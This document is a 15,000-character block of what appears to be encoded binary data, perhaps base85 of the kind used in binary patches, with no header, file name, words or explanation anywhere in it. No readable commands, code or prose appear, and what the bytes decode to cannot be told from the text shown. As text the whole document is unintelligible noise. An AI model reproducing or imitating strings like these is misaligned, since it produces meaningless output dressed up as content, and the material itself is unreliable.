zM3rVR&5iTHzmrK0^+On0^Xhk2M`+_WE8i#jv&4t{IWQ)TkUDJv6y-vfHOOY?rmeuz z-ul|w{+G%1)DoYfsC9qp+4R95Krba%Kfkb+62dkjh{`JXrtsHy(}i2%)R)(h!em)coe2SX0Yp$U8_n58m{gi5%Y+QdhD0_&>)U90IGOxE- zmg>ih{w55|;#jyHFs+l`U43cRII@5o&#+Bt1gD0$;F7lUY04Vo?4QiOXsKR!NXh6c zYD|>%^*qb}q;CH#vFO$DlM9T78=IRKo9WJLwqH*w9P}Eiscfb*q?N4n_wcOGGp`@~ zwm*1dCc4HY#n+7AD+SXs=xQ^NCN8)m-8&EgTw#E{Vb0z{!8AQsHV`jv|eC__L0 zzGL(_sA2MW$?0v4|NLcnMoxB|kY~gQcB95KX9((lm>|D4s_sy0g1?Tm<055Uuf995 zPEdO|{q<|$xb>6O{4<)QVOP(AeFKN7*dp(3M|~@U%#<(FL$+94w{7z<8WjTz9HrF^~MQlnvyYD4C1nCYE2`bLNY#*vi*Auy}SIjVb>jv#+1n zPN{2kUV0oS(=311OliYNI8e|JAaCe}{aFCP}dL`Rdw)OuKaH*O{y_=H5RVb5qznOTB2Z8#%3gPbbotm$OOYYwpR z{dDK~ZTM&Q_sQdRyC^-vHezqZ%SjjGYK_MtY;r=fJZ7Y&j=v@9Yxcue7z@9~jyTz< 
zxSC+nn~wKGJRm~&Bj2euaWw2`jbK2FEUEjs(CXrfDIrR%4aaS(B*lnM=b1M(VO?Rv zg*}DUF%|7gXY;&_GNFZlnfGLTudle_Wu<4=eHV-NnNk`{#rLPZgDX-p44=^?)+79T zc^?y{TfYqA@-(!--X^tCrq{a0BRO;Yn)HkWLi9@=y4#L?a+(+Cdqn2H(;z{!CEc^` z^P8eZq7RI~oiW`-Dk(`!)0t;9>vH1m#@t~%JaL_+SuG7oL4U9* zx}lWkIKcJmqf5Gee7tfWNWC4R&h-=c${S_D^GBk1JZ@}X+QAackqLfu;`}}Lq_+Osa($65V);dx?H)gr^-A;wLKn&D1 z)qEjbeMHA-zqwQ9HUCc^Jh)+Q2xetCQpCHKW@FA9E_f!)yY~6?ULXlKa1>Ew(L|>t zlMl#BmNs^+@nVbif>=BGwkyP{3s8Hl+|bv>dm(y|6L|`0YQ9!tq;oHCaCKe+T&(BO zm5kE*O$oCWOS_t6o;s6;`KVP*C47ljaP_t#;~f<8uG{KEd)Sxa)&^l*t}(1#x!od8 zmWr=w|3@Ujq{d&@#1>{Lk;>b-R&o_wo3Vd)9k2r?zSa$FBn5T#o`@cJddM@UHB|Da zgVrfoyb%wQfJ9@cCM$Fznf1S9Bmrp)F!_aRy`<%dkuR{OL(MK`fasl zJ`BFJlW)@uKQpiij5XNSjjal>G%Z=*_U#rNlwypPS#F42<+ot)SxVAXmHjG%n%dz~ zWO}`ZFW7%_Y}>uAaT3KfU7|)$%e>~oT9vhb*p;Mv?J_``n!qrZT_QsQlvv|QVgj!9 z^5Atp^03gSBtr?T9v@Dq8F1%D&naws&YVp7Dg_Aid$WE(PyNV|7bq27fk<|^4ob6z zULoA8Wv%x=P@>tEZa0tOrJgzY6>NPed|o)ZZ}4b?W!~aS;J2L4!WvbIIG45L;A8jKFcfTC20!hY zQ`v#-EnuHaJ_&r{TDTdFY1=zO1;Sj?xp!trIyV$D~?+Y8-zj7-e9t?aStfZVpZ@Y=s=^pg>o9y*T zpOVd7t-@G3ydF<@V5pY5c2V|1(1inLy6Xn7+n=L-$4S4&(Y$>$Hqn~ z0mm=N-Gp!iP2i{($&;m-XJs5{`;|v0tF(u#cbc%k8*??`Dm&vYqq05Cl)VXu*o2-A z#X7uVl|%raa9#yf*|q^t zwT9O&9=)uC7UQ5Cl1g=O$g#{8W{ar=b@+8`KkJi08@GM-+cTOwnH!@QftlUE;5mLw zGDnLwmXqaGotBAe*FR@@qz~oFhfzTf3|RNAW4hu!XT06!IpzFSQsWO8OYca#>7 zvMgMB$Ldei+}{`(Or!{sUzw<~kl;0J38m79s(x0DVC{jk4uOf=HU}wff&*gmH8Pd= zvN6CEi>H$W9?<$B<|KoKRrYe4UGW!eE;i~=w2ozD7!ZuA?Jp*3bZ~aNyQenDr-C5* zS__|Jzv!4$c$gz`P4yEx8*LOa#0TF@gCsR1L8EQ8v4{GXDcK(60mG55skJG@=BK-F zi0NYwgp6VIVZ5N`Y}reOKATk2vWL@bP?Ij8!6~BCt=rz6$edf3vN6TJj$ z(FxofgLRts=Y+QMoAK*$PHXe_>p=TE3rFVbyayocP3e~V^MK258!YUg07RoPI2|zM zBA;T(73x6NOw~var(_%Q3lzhC4P^xBxP0Au?1LjVo*V%Km|8Rrg_y7MUJRMX>}^Xw zR!N~Eh$m-RxV6+XYNL3dIZ=4YexZ?f05@L@!=N6Pv>`28O`_6WO`r6}dpk{Kx+Ym|G&$|~tCE2E8-Jo=!e z8n3PEPn5*#j*_!W1C zSD7v5h38Wb&YmLytVQnanX~8ewSNKQ2}mni_Y@hVyqqQ6mynninpnxbm16dIokNwr zeO;vItiC_V_^^*fnHP3=d&bc%vxbgTSnc%RNhV7H6wl;XBZ}%E1-|mtCz2M$Xxf}$ zQp(qIXV2zc+<004QuZwC{@CCPmH)aZ$>pC)uLflfU#dni8p>e9J0E8{S~OYS`~UzZ 
zu5TZQfug2~%Ma`qVQ!DtUxWU6$+OJ^yi}(*9T@gK@H>7&H=I?y@IAxa#mQfR`3tSn zD`GZ`8#hx_e=o_v_-jgMnfe9^aKEo>&Y7@JI*d0upCd6)mU~;2^hy}Xa870m6dmA3 z|KAI`srK>YNy@v^SRCbOkL{KW(b5nXD6J&E;gu+-@?c@cpcUcbjJXw4=YMa0QT;K7K3bPeKyDwosIGk!~x{DcGYFdHeTMI=#@)nRDaDU<?^ovj(tj zU36PFha3FY2QE`G2msH9%GLEJ!|kn&n!ymD;izKK5tZ#*KIC2|{H({}pVskvfv?;y zpN{dF8+%kAvY(5R#I!J;&MtYN-t5xRCpbvEobDR?;BccR3}LfQy`1Hl{a_3jln|>z zG|Y58b#7)9(ePFC<=@X@OO$4RtMiuGSMBpE<#zKCC;Ypcb@Iw-S5Mz%*f}*GZ~x6$ zQpzG;Ho2EbCEovGs{g&)|1#cxz7iOEos!LNWz*gD|MnyQ^K0zLFH?^0X{!8w*#Gub z|MPRFZ+*-K5bDh)-)W|Qf9HSu@4!jG0_*&L0%NoPx3~ZJ6|Y|d&meTuL{#aoKMULl z1URoitabm<3U3+!mYUl<-v8TQ{&?9x-`d|>{l`uHd#nGa_XC0BZ>#>JhyEQv{uomJ zp9&z$smBlhH4EVHxc&DL`QPa7cL4u8ZvP#(|IH-+j@y4UiT`)v_WyrkwOq-?aG7Hq zYSKpcKS~eY$|ar~iIxmVbjKA_vK6O%^7xCj{=*=D>I3+E;A1-be~>1y4J89P;p7Xa zMxFnoasTVW?m#Y7ELgPsufP9@ZU5*Hmuv3=ISAyZVR_PNF8^2mB9{duLu*%x#sB)F zz}JCJ(`8;0wu}9bZp4rpNcdD*mkdrhhkskspI`ZVyZ^LBe{c7n z?EP=+{&N8MJDB__y!;(Z{=Xkg>gMaN`E3)nCJuvl1UI0&)n=c&C6tX^>ft3CbNNz2y%+PcFAY}ed6)1i86h0hnV7UC^a%T>|!7iZST z8vu#eFL#s1gNp5@aI4?ILR@I)CX`(kftL0SArz*G%t9U>Tu^j>`+Aa{qTk6U27$VA zB#Mxlg*^V#qxrX0DTcf~GhFoC@jMDpzX)f&WMOM+I)s=Z(yUp8IX#oDNuvkO44aSi zQ#wvTY--9!)c+h3{`ksA6X0fX2@Xph>R!K~yH^f*+RRHbmERU=>v7+tV=HDOAn7hs z9-*7QUHA(wQjQy-W$PX~OQ+B7S4VZQ2hWnL42o$rSeLNiURUSE#9yU6x^a9(9(*Dl zEveod35mMk(q;-il#U)R-wS|Qq#K-|<77MZEJ7X(=vj!?snqm>k3p{)+KdmaF{bwL zm92##(@qjJQr9cG_>5+4gi3SOiHXQ|db<5luT$ITk~bEf0}h>~iQ8Lu~6WYQDjKfsn=3qG35Dj;nk-k3Yl=W9I1z2={&iVY?QnaL@^lS(FhnUB4B^7;j z2YhWW^xPqcj!}LoR$vfsCfAk1J2YS$ zZLmk5(;DRU+?rN9XL`#hms8DqTBhfFbO32l&dJtn?d!%gYtl<))du^!hnP+4wy@hj?ErmqnuX-H9`(&y(L?=VW?HU6VXkt z+}_2+uyWTvIuXNH?GIoIC%WjN+EOnNxo0*XQ>%5o^G*qWm==oOP9*5I#%>HR?#u{S{!ZdAy{+oC1qCr!?xM$6|C%9UD|2^>zncgx6mXlY`V(7WB4jR@L*5ku<{#yq8 zGDla;;ugKBS!{q7Qm+!MO(V<5EcwGeXF z(2?eNe<#j)b0Myvy}7h(rDbAwB#ikwFw1)cMh0i>R_^Du8bf0 zv_c#re7LCf&K;F4>L4^r)Xqsvxii?>o8vDb4cc?!Yz`%S&gL+@8dd?d)-yl2v4eKF zyXSd@&IG%wH5a0ByoTBLi@fzIW;sh%;n0WVd$p_2Uj>&gI!d+!Mm)NRjN(bq+=cLq 
z;2n3pwP>w3W%4@4?9o|QPF%km*Q2apNjEq%c&27*bW^=rwmZv3jTjyMmI}<>yASTK zJ5q|IIRz$EH)vjY^X>V!c>7X12$QqE@|i;7$HXyxSqG7mpd}c=gXzms>d6$%fZxVk zOX-)Skul_htL86D_)U{2%mo{A&8gEGZ4IMHM}uwyvK9j zexM6z!lU&u^;GlvHC=DN2_^Q`gw}{oh^b1nlW61ZuV!dB_p$65c@XZ%xd)88c6A^V zP~GQ7R2lgK4!SE((DfpXvpVFw)UoI$^(RL&^-~NNrA{17j{8`A3t2P*_5)0Gpw;~y zQK9T(D+a=^v^J0i{?z9!S}Pd!X53(Vn%&+IW4EdYI@mUch}=R4gO1YD$pvvnN9wUO z`|O0`U&H2kRorda0zO9vnbL83^*Ofr4?&zMA_On#L^r_p2=Rs7|IV@+tDc;h582QrWXF&oDC*yF12KB>948*XfgbTtyCH@)KZ?!j3sU+$SplKi z6$kalJN0z)0^cnegTGApw1DWY)*ao2)nsOgte^aGMzgDCH(D@+_qvf-wB&%; zTxg0ZS$*rVosKq^p;KXfP|#^#g0#g5|AU;cYk^R2=BZN^d%ZMT-M?GKuy{}BoAXe$ zU_VpW4c`rCe1_9I$%NICc{g2HfdSin^&7ajN22teDuuX7^Y)O(g`}Kh7|wj2EZhY9 zTw`45hYeRi4A$8aVq0Ktr8RzCDJl(|ZrkCtP)m-cNdzUvM*zM)=(bkwWyBP5KejfJ z*X2&3*nzrHm;E?jmK{%t{lEf?s4;7~_ckHHcwt4N_l}H!5Vix(TF5?4>t7tRI5H_B zaEG>#JHux_B5}2EhQfw(08l65bSv&AKjXc4cO)oDHfMg<#PiOPrcuv%1$|>b$MO_a z_UnTL=ZDj}eltmz(uyx6MEV=@%Iz-G=Y-J>h_g$o9WV^i6+#UwT~U<4{QEr^J(uEi z6964{zKqPfqVqAKA#)-vwcr_@mJ^FH1IgLgkx9BvS>I_t`G&O+6!t)j&dBe$3rxYB zh}!DS380Q`K$RzeDFmLoBbKLkEK2{J@c!|Yz&Ai@{U$zsDt3fg`rz1iF1^er`ngIz zyA&BRd5vHB&33^t`zJHFCev5#_3v@{lxE_W|JzNQxR5Vl0Le3=(aK9ZwN zE>0WFgs5`)mMZo})rGKybn56qWouKXuViHkhPqZS!E@U}`QR)`pwDrm<=pBEb;AYp zA@jSsDyp&;4FMVGXR*9(5QfEuH@#(@x3dbl5fy$5nQ+#tVblIfCVuXC(8!jO$xu*I zVVIwufbhfxMyKmz&w_YhOSnN#BP#t(ZWwpgr_R^%x`~pVByG-~H+5n%-o) z5%81dKtm8?my_s5(>zq5Z?x{j8)3G(aOo105jL~rI$LCW8Mp$f(@kq7f3h!K>bV_q z_iU9H$P?4xs(c88mR)C?wEMbrmz@cAe@FePVr!(<0bR;IhV9t*dopkwaHc(WOmq+g zXYPHM-@%EYCt{F$ef3e?z`PeTJ;@vX_YCJXqn{u?0slLs~e;YeLGCy9YAa)bs(rEGBX_D$otTrU*wRZ7@a$4Gar1x=i& z38~SQ9UdT_-nDWfTAWbg`S}Ej1UrYrP)}UmrB9f++`lMpPPn+!M?atk&Y$Na_%I=C zQ0o=l^$SJ3gJ^^(h5J;3s^QrBWXaBf*xgBE$&C+Tud$JqORW`cWGXq{c2)PJ8V^l! 
zUBi^I)mVE;n@+XIO#ZLERHV-5D2O4q>79C@5jjxWR%wi?~GA#IlwQRUD*G zztAdUb%DKkL-S#QVU-gQ-2^ggzIMY=aQIh^E8Ddyik)1h^R>>5CT}z!&j0w;vX<0} zCr?y=@CeGRo6g84A+*}*O7724m}h8~tgkZJBf`Q$beveMj;iT*JE#?lNe}re#P*T~ zAkIENOt507Cb=1Jp@@B`a?Q#1ZP8@-qpEg>^cBBFGjHUmqE|Opidqm8=1yR2!?(AZ zS8md!n7?OFrT}nI<*(YTsOAr)^vEbWJbp&FFIkn8E(QAqI)HpV;&xD7TipYm7kX|Z zv*&Cw!k?yNw{B@y>2SXd;)$2Mm*v4-;t3k`sE6#^*R_IoaSK?$htMD&&svAXpH7I=kE{5zEtdv2}b~ zpp;wM#&`TnrU0n)e@>5MmYT1=7hIst1l3$J|l#ay$II(QD9-8!e> zLRKmE@VQp6)u0UX9+~aNz#zz^`6Pf zAQ>OacHJcIH@qO?fBdAiZX@m)rZ&z}-G#%z!F9<|IROtVV%Z&~Yj-vY5W2r2OrO(I zvT@n{^llYz|G2!Nh3YMyGy=9vI$^6rGyj3yOHgDDmQkFLd#R%eKbt|H)7su;HrOU|9PV6tq zblHEB-}|}loI)JB$tIkgN4QRE@Ay~cT*1-K8uo!v88oInpF!^C@KTX*Qz%OmpUE39 z*K-Q;&_fX(k4fdb@H)4J{PPr`)mwXi5zPVx6iyXWl1(~tMLNdZraDh{!1y!6i!^Gq zCM!E}k?VZdGYKo5bK$<2o+x!gr_RdZmYqT*?D=a-0Dowq9y(+BTX zInrvCgMrh8VXSe5*b)$Rf&Ln&o1y3|pU($8h~VZ#c+_w7MWodLSmDyqbl*tQ28Z0s z4zu9Dh!$i3FuD*uW>9vWwpeG(0Oh3K3@lBvC5(bX>`t__&PZ-ft0VN55w63PfHrA_ zjhTh$TdUPajTFFwZ1yH3Ri$0R{ARI9NK-KHZi}^?$&`IWK}T*$dA!p&S=yqcw*Hs# z%L=ncMAy`vcNSQ|K2e;|TrAobh2+)0VJuQc$JS)k%-qp2qCS47{VRPAh3|};zeyYX zVQ&bye4=G_)m)DE;%N0!_~poCs*k=ut@KKkV@`1u0JuO|F#$VDspdE_@jU)dNFi9g5?I$M9-%ytwY!l_j+_k zq<$Mh$>!r+INed2#o>fa?g@V2$q|_Do%l-42*N1FHnrVlPpH!MoE0H`*_Y{*QURQ% z!E-AoQ;GDfwLNxbDR)!4>yh3fQ_Wplrr!zMXfs z=@n%4XBgW&8Lxd=MVvmmMz&CApR)O8E-@}Fc(a8UDP1awmzvwSTC739jSS_Q)$I&k z!`vBpXQe_Y5~+L4fe;vF=~ZImicNS4Ix(>M<_Iq+c&y^6|e`^4i&)l(q4v52K#?H5>oPLoJ_(F3TBgDvg4oIe})~}9-uA2r3@W)vLz^VSuE3FbI ziw8EtS{h`-JcfM87GFK@F+_Dgal3>StQ!0p0Tomi(Qk08+00cz+%tfk89s@TH1Vp# z1ej%3bqyf9b;^BLLn@Im<5n5BVs+g5$B;V0+!V#=+QlDpzqEA*aC7>sWD;<4mdoK3~-=n-<$|{lpZcnH-xRsc|+$++fR2gwL`AFC3?$vLq zsnO4A3P0OzVgb4=M0-H8#PZW8FO9;o`bT0Z1zUuG>4zrzzPoDyy(#A z4&XDzFg5#&;q%hynyE;$Bk$#_g6U(h0*k66#`R`z|XLa|p{%c?*~}eyQX3Uw%0g_4wV%#@kFU zHz{-M8T&=SuT$QAxxP6i4y31*nzh9-(R50NYvb-&m0yKMI1b~OXATcawsPuc$u3=g zY`1-GVD@#*ko!O**1qaL-*(;$;i2Pd$UE!@Oo`DOT2McH@1R+M>j2LU>Cb*SSoEk( z2K(-;+fKr8*t|?9dD@5iM9|3|oYicT<{&Bh;)l^PF_jc&*mXmzjDDX|5qIR)wNeq# zFV`R~Uu 
z0xNvU^!#3tNRXP&QTy3T^8IFe~%&{x~5dwELgKA zII5BgIv+lWg0i>kp(IP~w_U-|C{g5XHwGtSg2-Q!J$XQOrD<`+M0R&mvZJw^Rs-<{ z4sZ&7S{jL

r?|86LMaQi4Zj`D&4H^AZx4WE&?XG;0Jnc!yPn=OB>l*&8{lvn)nv zdAAOsSYd0$x3VtH`g3mhBKys@#(~*`jOP`bdFvb|{Mti88NWtosTv<|2+nQ5S-wcz z)MTnEz*DQ-4UF^VQe^2-Z~B>5xHwKZcmz}jthM`nqO}Z}{ZMGakinlao>CY_ul{a+1~s8@_u-a{RQU`o$ET+x#G9h z`km{vDM0OUgrZSjq%Q4Z4<`fLY8I(+OmTc~lSXcwf$o@`E zSr!D94brzXwi}LPvnK8+g(`G{7$x%?MrNUr4{sCsY>$!3k@{Hd_;#@D9STv86L+6n zmT+XPaM9(ut+rLp{a#M*H77o{#O%?+Mf=~eCR#{+6wkf|%dmt>^eY)L*(ynqA z@5}$+>TLfEDtZ7KL658h*73Ss@_sLTkd@6A3N#1atFv~X!f@2 z5&j*8jaJ*EY|1>t*xH8v*7quI+)esHk2c$d_-B+res{8!)+}nWD37RHjaI^6_KWLk zp84;#lh{&jr-1?p%p=K1+*Dv$?Kd(wLfIB)u8wSPw zYt81L#r0>6AXtElQEIePv?7MvB&Z<9w>|(3AXQ1FKhH$`KmYyT|K?jV8>1AT)sb&n zgFQ~Rz_3aV<^gW_3tx(cD}MofY?gp9HU|({I6E|Uk>xXYVrS99Ol2!)c>A0 z`BzK+@6n$BRc-t4(Vl;`+docGiMXTCaDN6>iPOo5#G~1A=k+HDCi0b>oL?JCTqMAZ z8~yG=!AXa>C#ZM(N%2#E5r+PF0A=;%NxUIA!>s^Ghl;&aa!w+j?Meob6XwZ@JKLgJ62r%xfteJ!kN?;yCM)aEc?sU=wwlod`sQ{dq^&8fMDj0K zG?YXDD)5k^U@W?p%>sDAA-wBO4I8H}3sh@)x<02J)*)0@nU!U_oKjjnY*I{8TBn~Y zWdAj0{j={J(!cz=FQwK&k5skqB)N7{S$`fSxusxfH5mia369ErS! z5BZEnxL`2I4u+&%xrBCFb2$C7WX7#@E2mb)v!L|f_C%*#CpOsXFcG(N=*2;$z?KN zBI9|NDxFdk2mJU13~K)h%xn-e^l*H;5<&sn0M^a+xMJtIf|Sk7kY&`AG*I~kZWq&R zupio9sH1TraBkhTI^O6lAMsqO?Q8yZ)wKU`oS37e>LsuL;4yR3{#-pg#HbFb_wt^g z=alte#Q{NYLVTC{h_NX04)nrgMsGy`;uAVHflPJ0q#}HSzW}&Qqn;sGVgNFbf2T0b zznauPnaAtCOSO@P3$jWbv^^aR%}jIW7M`i%C?zEp+1ROAnWkCB$%v(kjl9X4`iR!I zv)iNBHtb0x)jw# zeL`T*3+*Kkh=Aw0>=u^4!=1i?KMcuS%TG7LL2&U6u0V;}(Lkf0i z0o)NmJxL>HX)JL9$zBW1E>0H$C*^G;Q|vSXprhm32yCb{-|A{{>>LP1G5h zaa{#YusvO?R(_uz7^FbRze&wb&B+0D*h*_U*%$hC;Wx^m2a0dS8_`+a9)nL{pG_+* z6K}Zni|S4dC!`H;cFWO|Fc6&x`6Y-2iYQOt&j@uo(bl~M8x->I#)+QAy39`)39jGE zM;M-_vm^abbm$LWa6eW~eS3@(`Cu!z#F^Nv*F<3Kw;j0!ShR#fd%dR0Q|&t?Ml3g1 z26V^lc0^GjbH4F-;l@754pJ=kh1m`;OCT4hmhSn1oU=|oCB>CvfvMID5ro`?JT_vR zTh*cDx+cQq9A$n_j^Dei_1A-C?O6uV1Ks;jKdO`q`j|6r$yUd|babe2yzqMlb{}^( z%cbMEUxNz0$$4blVHmGa1=h3@i&hl$M8KiNr=F!uqvz3Z-rF0)DcU=r$R3JeM@Q!0;lw&sw_^fP>Ap5cVBqFu0okn0vV97&vE zAD*=NH*b+f15TxY-DQTTKD1g@EXU61@vK=h(liH|whR;QMBMjvXz(}|xY_x`@|)u| 
zSddkd#u4b*1pLl`1fs9TeUq-9D9r()H|ab9^-j)pK)btvA)YsluoQ|SX4v*NG7`zm zM6_y8Z@VH7Q;k}=gzY*D(tT(+>_bP~6=lOzGRBDe$${JcQsI(v#hldx^USoad&8#L z*t7zD5B+=F*`~G3p~^aXZVAh@?JxR88{k={!+H0(rw+%GjEUsvj#0DKxx7>1S&4xc zXWxpxC-3>&J0{_W&--9XT{b-gb;X%Z(a37IF}HxDZm(r zWmwBanE~ns_)wI2ZoZ`}(X=&K`7N2T`SmowzMHyPPl}1c85~-Z3M33su;UD zSeKow5{H3YEbg#Vmrpu8!V9m1J9fpo=yykTcb*e+fAPV>e_(ZAj-{_@iZO$kkqYUAUb3k)YO@wls2_V&4N>KgGf&dr{gU~h1g=}@_UPQXrjqjrFy5qW1BUSlDqMYj3GN$GAH z;gXw@$}jAwVn55=O%mGZ{XnLYTvpyX6^a0Qrc3*3k|ZCZ>nGw}=MCcHQR( z0Pt~_SYow;RPGtONm=t=s>`q*MdDrVmg5Hq_f!y5&e9L&&@YPx&t2I_NM+M(;yHKe zDfG;ShXQ7g7Ao->`pX^HAYMeSe3>zN5jfdGZ7)6jdE8;9vBV48OzH<6YbML!NjEH{ zjorR9(YY%D7_buR?={cb3VL;~+>!9!(@`{#~cO6DMy&Q zxQK~Me}{Iv!l2}#1AU!-=?t|g8grx^{ShmSt#ON+KmetmhN_>jpICDEYYDl<_Whj5 zujvmrHrxfK?VL~ftMX3ecH3we#j+`x3`9qF_494^EgZY4vU?NJ&F`~`ngG3}p9kol zvw@zDzpI+Qh`dy$bU6VjzL|8l4;}*gk|%o}vzKxI1DK(h_I{Q*IBH>lmAwZHTr0iyEPXl2Omi#prYyuYA~i}oX)XE?fk@$BmyilNs;5^hq1Og zi7HSbI#IFHZ|@h9-;30+gT{s9iER z?yT~HM`SH9hqAQRc%ouoqB&2SC;m>mtn0y7N;BcL9>Un+6_$SDV&SVA>CcOtQ4-$a z`CS9z(zg^W(H9smc!*|{1RDd!W`$puh)4Y?FfU?dTk>Mayn8ez3_P=Y?i&B~E2jiU2>(iO;Bf5cTq|97ja&Fqke4 zzdJMFywGJ*l32BODUeub&*VN{Z6}@cY|UfU1TS?EW`Af#cEX5SM0K7G-b%^XLy+So zK&01#7D||M4WrGFgfBf(aIML8D3lAbxpZMD$!7e^(D6^;>tDcc4uIJThzA~$G3wi$ zShjy$%Z!QYA>(EanDTlJf_5jx)ax2fUE`J@XGwRNw4sE>;41FiV)#^&%}PzJJ7W+{J^} zN8Pp2cZhBQ)Qr-8Ou%!a_T?SMrlW{r#hxT%(?%D7oc3qZBh~orqIsLfIA9?UxP}K7 zSJ8RCpNP5>aX*K0Qt03~aP90zVY}IDCa$D;cgyadQk7e$I1~ArsvUiK@l*;~h`)-#E%*bli? 
zh0~`Q-p`Zm=UW3pQM3MCVzbrQ+xRS+k=micpB`@f@a(-NV^CgiIUTTu5Dly5Vz`&z zGr+*GB;FM?{QMJVx^jP=g@mG}D`>Th;+o9ZRo%*r%T(;#tv+yBv(Mr4hG$|nvotsG7e5ev;=a_J{4n&}-c0x&BR6^A|sxxvMI z8WGToz2Y6II}%N(0cBU-3A~* zppFt*Id0Ie+-f)(UzlRWrgE_&N#*1tCcbd)D$UUe%!r6#51#62#6<%UkGXHwGLdCd z8_?Nb#oW+a;sUcGA+Jow$lE3GQ8P?E!}xSDpOcT|!(rk^sn->&RxYu1wW^T#+^i#9 zJPzb$Z=sD?qMzBOp7%YQa~F>S25)I3ZjS<*Fe_O{HuFh|R+v>4k>J?%8g{>n&Y1V5 z>TJ2rubhchaoDiVBiyHdp9K(RCck`M%*~!6z)PRTsV1=}bBvZGQ4ySgJG>uqn=pkn zkjuT+H=AN^50*=~=o^fRj_&xX?Onm#9Mu4)N=m282ib-;h|I3k!vhFS{EjBv&Butt zbFQigAI5uY^GJ<)ya(EFzT2@AK(83 zTUL?w&WU&*7Tpkwo7}x}ToK#iyF2CzS8OK3RabJbqar3c6zw|0B3uUB6)KbNX{~LI z9al8A_LZDlco`s%L?wL1P@`^b{S&jvPMsQ!_g=YYxkJW*=p-O9PCy!I6G$=RYzG;~ z2zq>e^E(iH`!d_N*Tl(qMgmXsyDj436H1ZkEpRZK>)SC!?|s-9@l7rL!hXt|qHGc! zVNf;*Rzu7|*NhWNz)s&1P`yb-k0o6Bn$slNz?45tC zUfF_0`jT7f&inX>!z#&>bdCMk9I7w!JF+7Vkuzv{ux4?AI*>sJzmsz1OIE3yfBYEq zAv{&Ttnr}81v`h%8|%1jxybk0ptRas-&jI+3cyDUo^w{<8ZK4r*jf+-cDNX*e}^%m z%P8Q2d7(%N?{1p>#9(Vv;NIyIZCP*4;Ar4%fb?YcCJW+XWx{CwXSC!wsep<7B-Hgo zK4thvCD+p`AbC*p*PX{*Jj+dfAiGXi_#O}hcsk)CAV%k~=2a>e&*81{=MAv%u z+xap$o-oDKGXZL=IXSFlYu}5iMZg%#!x%Wr{FumK$$^yMj)^y)D zcbw7zGEQktYKe8=pAhRFz36K z9z`2ptI2T#ru8d_5~^ptbl4WzE7Ds%?`?D-D~wC!0F z6Y#?$G#AO`o}D7PKy6m`PVoX{a>*NBFIK|+DzSLA%?&F!sz-UOjQT==-K)LR?9bTmJQK!o7seq~&`g6rOJBRj`_ug<< zNbdlHK&`U3rN}m5QPf^7yFJAYWWZD@nO}+a&IFgpNaJgAxcW0@) zMl&pLX3B=swWnj=zyTC$wy32|VdP~?X`Sx6XI_<%2#`8lJHEY~mDp|31V#YXWZEeK zR%sTVcXnhD)?YW5J-y&PWh}aNdp=;PG?s1F338F>GN53ce@5#+U3pne=|^*$utnKu z(lbV!b?)?e=o*tbwIb?@vXTd2Uc~tH{w~Q*p@{u_U}_)Qy{B9<0Q(SVNmniJDXkqH z-XQhItmrO$g%ICx{ZMGvTT<8XXpr1M$EbD*x@3-+=!5u0jL79HJ)<%I?)_SxU|MrIhZ#`*53f?DSmY+68Emju+mR)Q+Y2f#-8Hd(-V5! 
zJhI1ZSt~F;W05oDx@Y>(+v1EUU~R5q*lw<>zbLwS3&slM-p8S(sk!qsuxut#lZ@iFpG!;68xf|U_h?Rfohtfv_07^JTWd(= z>H%8S?Z6lM*quQ7TNq+t5hM87SEy;nm@b!aS%d2~`L*^AYZAf$9YRvevrcvOTTLw& zd-e+<)+RT0X**V8Y07WJu>_agHrlw&C{i$Zu@GW$_iMwCD?_0MPIp$*tq1sK`Sifu zZIkBF8OB~#nm~bg3oRWbD)zYQNA|+cYs6~ckWbsj!Zxpy*Rd=S#V2n(c!_2$v1xc* z_d0Dm%)U5w>RH_aZXA)dfkXYnH46_XT{aJr0lRdfDI@biPYF9W`>jl|f^LRwxvA^7 zsFc&2E|rF=&`kq=_WanaVe6-6)J?!i+bJoX0zkcW`UG&cJJ_u`+!}K2v#wqIo15fX z`nirgQZmo;Xb@1o5l*_;5ym-rB?a(@8|>i)1>q0a-aRTEd9V?f>5qNdm)=11Qyi|h z39+^s%$x*KAw5d>eL;~|uHIk_`oI4WR0TXZ?c{vK6^$;d(v|i@8gVbseK!`pnt+58 z-ciU>iMD^%tFojy6{|Tq##C|3rq9%Tqp-DFMe^KrORA@K+L;^*DLpYS!Tw z3TenJ`Lkghoa@hZe>FRMDoyAtd{6OFp?US}OAk-yTkEa6deA3+)13mJgbStMikWC|IR^y+7vGus^0fu)*cnhJELcIKcQ-jbzN0Mt4Y&aQvI z%0TT?^s1o*QH0J%Q#uImZo1lPakfzRD{-$SBCq+RmYp4K)#lUNTaWXL<=)SJt%M?W z?irvnNu9fm8}1h^>9H99nTmI$u!u}gy&L@&zCDQ-en6$grt>{rhvVWFNK6r_mJPebcyfT)dJHPxmr-VpoPs0wz3k z6C)l;-F1lIJNt0TwJBQq$+t+*D|stqR=Bhk;lC{{26}i(5=S!O$m->r#eka(FN3EHxS z5qSm47n9j0Jb+tn*Y(Hpda$ci>o8IZI^=3YmSUMy68rq9ia{rz?!{W5P0INyz1#6e zvTQj9E1Pyls|SCgo1up_6l~gtc#%{Kw&vGxu9LbD8bW-u?UG7O+3{^DElS9<6=In_ zHh-!vOK`dHf@7CII;eRUkxbDMZ;3NH^AVH_Y4xTG*yZtyPcyV)xIASaG=orJQ7Jx$ z#T(vRgOPob})seN!eGFu*i;*Zj!4CRM%5%6T$vk(d;L z!nWfF#xr=Lc(mWT6L7(0rJqvM59e8&jAV}iTuUF%nm53Vq$)1#VjvH-MvF!baturFEDXOmdV@X!rAZrz>4UFJY+0VQ+PyBGR z{T6f40Jv+_?+o(>ql-E24bqNaROt;;IuRH3qI-dyzvj?%5|gPuk6X1dixH0v8su3b zX=y4zqEflq1U(e&_q(EK4-dv{`%Z}%m`L&hCu=q-j?KfOcG8f_UQXv`#r)d+*Ye>B zy}G$(F)!cj9lKULVr`}>GwyO4J?|lZbY}{LMt)wp5ty&89eiTBKQUzCILqw2M9`ISNSdp?+ZST$&@}sl@)?LMaZmWYTWIh zqKHh~NoCEFoBCq->&S{y(l(1)&`(F2^@~GBG{3%=Evu{|xyJzcT*9S|JL{}GSn0QP zTkW>&T=XSjD4Ao-!80bQz$3ig2p*~)%nE&)*hhREFr}S-Al&zgx9j@bt)&A^aR26b zQ?)sr9$;IfhqSX@&P6ph+q-(ESM2)=uW7Tt3CroxEq`>F#_v8a>_70{m)NC91)(qt 